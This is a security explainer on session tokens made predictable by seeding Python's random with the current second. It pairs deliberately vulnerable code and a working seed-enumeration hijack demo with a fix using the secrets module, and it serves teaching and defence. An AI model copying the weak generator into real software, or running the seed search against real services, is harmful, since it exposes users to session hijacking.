Predictable session token generation using a weak random number generator.
```python
import random
import time

# Server-side session store; the original snippet used it without defining it.
sessions = {}

def generate_session_token():
    # Vulnerable: the generator is seeded with the current whole-second timestamp,
    # so every session created in the same second gets the same token and an
    # attacker can reproduce the token from the approximate creation time.
    random.seed(int(time.time()))
    token = ''.join([str(random.randint(0, 9)) for _ in range(20)])
    return token

def create_session(user_id):
    token = generate_session_token()
    sessions[token] = {
        'user_id': user_id,
        'created_at': time.time()
    }
    return token
```
The vulnerable code calls random.seed() with int(time.time()), so the token is a deterministic function of the second in which the session was created. Python's random module is a Mersenne Twister, not a cryptographic generator: an attacker who knows roughly when a victim logged in can re-seed with each candidate second and reproduce the exact 20-digit token, and two sessions created in the same second even receive identical tokens. The secure version draws the token from the secrets module, which uses the operating system's CSPRNG and has no seed to guess.
Predict session tokens by brute-forcing time-based seeds:

```python
now = int(time.time())  # range() needs integers; the seeds are whole seconds
for t in range(now - 60, now + 60):
    random.seed(t)
    generate_possible_tokens()  # reproduce the token for seed t and try it as a session cookie
```

Impact: the attacker gains access to other users' sessions.
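The following is an added, self-contained demonstration of the attack and the fix described above; it is not code from the original page. It reimplements the vulnerable generator through random.Random(seed) (which yields the same sequence as random.seed(seed) followed by module-level random.randint), runs the seed search against an in-memory session store with a constructed victim timestamp, and shows that the same search finds nothing against a token from secrets. The sessions dict, the timestamp and the helper names are assumptions for this example.

```python
import random
import secrets
import time

# In-memory session store, constructed for this demonstration.
sessions = {}


def token_for_seed(seed):
    """Token the vulnerable generator emits when seeded with `seed`.

    random.Random(seed) and random.seed(seed) initialise the same Mersenne
    Twister state, so this reproduces the page's generate_session_token()
    exactly without disturbing the module-level generator.
    """
    rng = random.Random(seed)
    return ''.join(str(rng.randint(0, 9)) for _ in range(20))


def create_session_weak(user_id, now=None):
    """Vulnerable: the seed is the whole-second timestamp, so anyone who knows
    roughly when the session was created can enumerate the seed."""
    seed = int(time.time() if now is None else now)
    token = token_for_seed(seed)
    sessions[token] = {'user_id': user_id, 'created_at': seed}
    return token


def create_session_secure(user_id):
    """Fixed: 32 bytes (256 bits) from the OS CSPRNG via secrets; no seed to guess."""
    token = secrets.token_urlsafe(32)
    sessions[token] = {'user_id': user_id, 'created_at': time.time()}
    return token


def candidate_tokens(approx_time, window=60):
    """Attacker side: every token the weak generator could have produced
    within +/- window seconds of the guessed creation time, keyed to its seed."""
    base = int(approx_time)
    return {token_for_seed(t): t for t in range(base - window, base + window + 1)}


def hijack(approx_time, window=60):
    """Try each candidate against the session store; return (user_id, seed)
    for the first hit, or None. A real attacker would present each candidate
    as the session cookie instead of reading the server's dict."""
    for token, seed in candidate_tokens(approx_time, window).items():
        if token in sessions:
            return sessions[token]['user_id'], seed
    return None


def demo_weak():
    """Victim logs in at a constructed time; the attacker's guess is 17 s late."""
    sessions.clear()
    victim_login = 1_700_000_000  # constructed timestamp (2023-11-14 22:13:20 UTC)
    create_session_weak('victim', now=victim_login)
    return hijack(victim_login + 17)


def demo_secure():
    """Same search against a session issued with secrets: nothing to enumerate."""
    sessions.clear()
    now = time.time()
    create_session_secure('victim')
    return hijack(now)


if __name__ == '__main__':
    print('weak generator   ->', demo_weak())    # ('victim', 1700000000)
    print('secrets generator->', demo_secure())  # None
```

The search space for the weak generator is the number of seconds in the attacker's uncertainty window (121 candidates here), regardless of how many digits the token has; lengthening the token does not help, only replacing the seed source does. secrets.token_urlsafe(32) returns 43 URL-safe characters carrying 256 bits of entropy, which is far beyond any enumeration.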